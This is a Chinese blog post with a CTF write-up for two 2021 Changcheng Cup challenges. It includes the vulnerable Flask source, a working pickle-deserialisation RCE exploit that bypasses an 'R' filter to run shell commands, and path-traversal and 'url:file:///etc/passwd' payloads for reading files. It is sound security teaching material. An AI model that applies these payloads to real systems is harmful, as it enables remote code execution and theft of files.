Posted Updated 3 minutes read (About 426 words)

2021长城杯

ez_python

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer" 
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0',port=8888)

定位一下关键函数pickle

考点就呼之欲出了pickle反序列化绕过r字符

user = pickle.loads(user)

有现成的链子可以直接打

import requests
import pickle
import base64
#e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://eci-2zedqu5w4d2328dulcrt.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
print(response.text)
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

java_url

java项目下都有一个配置文件可以下载

/download?filename=../../../../WEB-INF/web.xml

然后就可以拿到很多路由
接下来下载源码

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/testURL.class

/download?filename=../../../../WEB-INF/classes/com/test2/aaa1/download.class

在审计源码的时候可以看到

String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {

第一个冒号前不可以是以下三种协议,所以要找一个放在file协议前面,却又不会报错的

url:file:///etc/passwd
url:file:///
url:file:///flag

这样就可以了

2021长城杯

http://example.com/2021/09/19/2021长城杯/

Author

vague huang

Posted on

2021-09-19

Updated on

2021-09-19

Licensed under

Like this article? Support the author with

Comments

Follow

Links

Recents

Archives

Tags

CSRF1
MYSQL1
PHP5
XSS1
bugku3
bugku21
hexo1
html1
html原理1
php2
sqlmap1
sql注入9
typro1
xss1
反弹shell2
文件上传1
文件包含1
渗透测试1

Subscribe for updates

You need to set client_id and slot_id to show this AD unit. Please set it in _config.yml.

follow.it

×